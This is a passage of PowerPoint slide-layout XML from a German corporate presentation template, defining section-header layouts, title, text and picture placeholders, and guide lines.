          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="de-DE"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1" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACD9ED18-2823-4245-8F34-5FF0F815543F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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290501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kleine Schrift">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="!!Hinweise">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4810C585-E6E9-4CAC-9DD8-26CEDB23E1C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-30455" y="-316200"/>
            <a:ext cx="5910431" cy="219048"/>
            <a:chOff x="-2186263" y="-316200"/>
            <a:chExt cx="5910431" cy="219048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Grafik 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BC206A0-3CF4-44A6-935D-97453DA59C71}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2009882" y="-316200"/>
              <a:ext cx="1714286" cy="219048"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Textfeld 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D968B93F-78F1-4B10-81D2-1490975F9778}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-2186263" y="-299009"/>
              <a:ext cx="4196145" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="36000" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="de-CH" sz="1200" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                  <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Textformatierung über die Listenebenen: Start &gt; Absatz:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Rechteck 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EF90802-BB92-4218-831E-1E97A1F591CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835275" y="-308663"/>
              <a:ext cx="482600" cy="2039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800">
                <a:latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{004E72EC-F55F-430F-87D2-68708AB42986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="!!Textplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08563F00-2EC0-4CAD-896F-D355DDF69AF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="696000" y="1730375"/>
            <a:ext cx="10800000" cy="4564800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="180975" indent="-180975">
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="361950" indent="-180975">
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="542925" indent="-180975">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0" name="!!A1DigitalIdentifier">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F1DF2B-C55B-49F6-A843-8E7B4E869B71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229468" y="6251744"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfr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wrap="none" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284539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bschnitts- überschrift">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent3"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCDE7F6F-7616-4B91-9FFE-3A1272D318B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="3419474"/>
            <a:ext cx="11520000" cy="2628000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="78000"/>
              </a:lnSpc>
              <a:defRPr sz="9600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="!!Untertitelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DE75A6-84C6-4696-84EE-D128B15A2DF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112124" y="513323"/>
            <a:ext cx="3384551" cy="5292812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="20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8" name="!!Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25C057D7-95AD-4C74-85FC-04A979B1C82D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112124" y="1778019"/>
            <a:ext cx="3384549" cy="4284000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="72000" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417063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bschnitts- überschrift 2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BC356F9-59EA-4A16-A385-CF4EC3BFD5E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="3419767"/>
            <a:ext cx="11520000" cy="2628000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="78000"/>
              </a:lnSpc>
              <a:defRPr sz="9600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="!!Untertitelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DE75A6-84C6-4696-84EE-D128B15A2DF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112124" y="513323"/>
            <a:ext cx="3384551" cy="5292812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="20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8" name="!!Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E2527AE-6BC4-4D03-85CE-8A9B4E5A3E1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112124" y="1778019"/>
            <a:ext cx="3384549" cy="4284000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="72000" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127378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bschnitts- überschrift 3">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34CF33FF-C1B1-4BBC-9F07-7097C92E8858}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="3420375"/>
            <a:ext cx="11520000" cy="2628000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="78000"/>
              </a:lnSpc>
              <a:defRPr sz="9600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="!!Untertitelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DE75A6-84C6-4696-84EE-D128B15A2DF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112124" y="513323"/>
            <a:ext cx="3384551" cy="5292812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="20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8" name="!!Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E9BFD68-7BD4-430E-8B91-BD3750D7063B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112124" y="1778019"/>
            <a:ext cx="3384549" cy="4284000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="72000" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266032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bschnitts- überschrift 4">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="tx2"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="!!Titelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F5D95CD-067F-4BAD-A709-A261AF375ABE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="3419475"/>
            <a:ext cx="11520000" cy="2628000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="78000"/>
              </a:lnSpc>
              <a:defRPr sz="9600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Mastertitelformat bearbeiten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="!!Untertitelplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DE75A6-84C6-4696-84EE-D128B15A2DF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112124" y="513323"/>
            <a:ext cx="3384551" cy="5292812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="20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8" name="!!Bildplatzhalter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C74FC0B5-D83F-4F51-A2AA-24DF4126A8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112124" y="1778019"/>
            <a:ext cx="3384549" cy="4284000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="72000" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="de-DE">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Bild durch Klicken auf Symbol hinzufügen</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134261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2" name="!!Hilfslinien">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0B98968-0A5C-4589-95B9-53310A3C7AF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-313152" y="-316200"/>
            <a:ext cx="12818304" cy="7490400"/>
            <a:chOff x="-313152" y="-316200"/>
            <a:chExt cx="12818304" cy="7490400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Gerade Verbindung mit Pfeil 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2CB1E4-A2F6-4DE1-95BC-37AD6F47125F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4078817" y="-316200"/>
              <a:ext cx="0" cy="2400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7F677733-0121-4B44-94CA-408D78B2079E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6096000" y="-316200"/>
              <a:ext cx="0" cy="2400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A460F41C-76E5-4625-AEEA-1CDF683BB549}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8113184" y="-316200"/>
              <a:ext cx="0" cy="2400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F35DF121-A9C1-45F0-AFB8-3615372D4DD5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4078817" y="6934200"/>
              <a:ext cx="0" cy="24000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B851F44F-400E-4BAB-B6BF-0C520020A563}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6096000" y="6934200"/>
              <a:ext cx="0" cy="24000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39A24A16-5D1A-460E-B3EF-E4E3F75DBAAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8113184" y="6934200"/>
              <a:ext cx="0" cy="24000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08F0C212-BA34-4F26-A7F8-95F14BD64C9D}"/>
